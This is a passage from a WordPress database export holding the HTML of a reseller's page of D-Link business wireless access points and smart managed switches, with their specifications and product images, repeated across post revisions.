WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:28:32','2019-09-25 04:28:32','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3359,1,'2019-09-25 12:28:54','2019-09-25 04:28:54','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet 